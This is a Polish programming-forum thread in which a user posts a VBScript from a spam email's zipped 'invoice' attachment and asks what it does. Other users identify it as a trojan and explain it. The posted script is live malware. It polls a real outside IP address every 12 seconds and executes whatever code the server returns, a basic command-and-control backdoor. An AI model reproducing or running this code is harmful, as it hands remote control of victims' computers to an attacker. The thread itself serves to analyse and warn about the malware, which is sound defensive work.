VBS - spam

Wątek przeniesiony 2021-01-28 13:33 z Inne języki programowania przez cerrato.

S2
  • Rejestracja:prawie 7 lat
  • Ostatnio:prawie 7 lat
  • Postów:1
0

Cześć,
ostatnio dostaje dziwne maile faktury/zmówienie itd. W załączniku skrypt vbs w zipie. Po edycji takie coś:
dim pcoblect, urls, date
Function FaxPc()
On Error Resume Next
While true
date = FormatDateTime(Now, vbLongTime)
urls = "http://107.174.81.200/z/" + date
WScript.Sleep 12000
Set pcoblect = createobject("Microsoft.XMLHTTP")
pcoblect.Open "GET", urls, False
pcoblect.Send
TextFax(pcoblect.responseText)
Wend
End Function
FaxPc()

Function TextFax(text)
On Error Resume Next
Execute "" + text + ""
End Function

' edWrQZvJkg

Czy możecie powiedzieć co to robi?

PA
  • Rejestracja:ponad 22 lata
  • Ostatnio:4 minuty
  • Postów:3882
0
MATIK 09
  • Rejestracja:prawie 5 lat
  • Ostatnio:ponad 3 lata
  • Postów:7
0

To jest Wirus lepiej go nie uruchamiaj
Nazwa: VBS:Agent-BTC [Trojan]

edytowany 2x, ostatnio: MATIK 09
MATIK 09
  • Rejestracja:prawie 5 lat
  • Ostatnio:ponad 3 lata
  • Postów:7
0

To jest Wirus lepiej go nie uruchamiaj

Pawel L.
  • Rejestracja:ponad 5 lat
  • Ostatnio:ponad 2 lata
  • Lokalizacja:Warszawa
  • Postów:40
0

@senk2005
Tekst zmiennej "url" w powyższym przykładzie został przekształcony w hiperłącze.
Zmień go proszę, aby ktoś przypadkiem go nie otworzył. Nie wiesz jakie działania podejmuje serwer po drugiej stronie.

Jeśli chodzi o działanie skryptu, to co 12 sekund odpytuje adres ze zmiennej urls i próbuje uruchomić otrzymane w odpowiedzi polecenie. Prosta metoda Command & Control.

Paweł

edytowany 1x, ostatnio: Pawel L.

Zarejestruj się i dołącz do największej społeczności programistów w Polsce.

Otrzymaj wsparcie, dziel się wiedzą i rozwijaj swoje umiejętności z najlepszymi.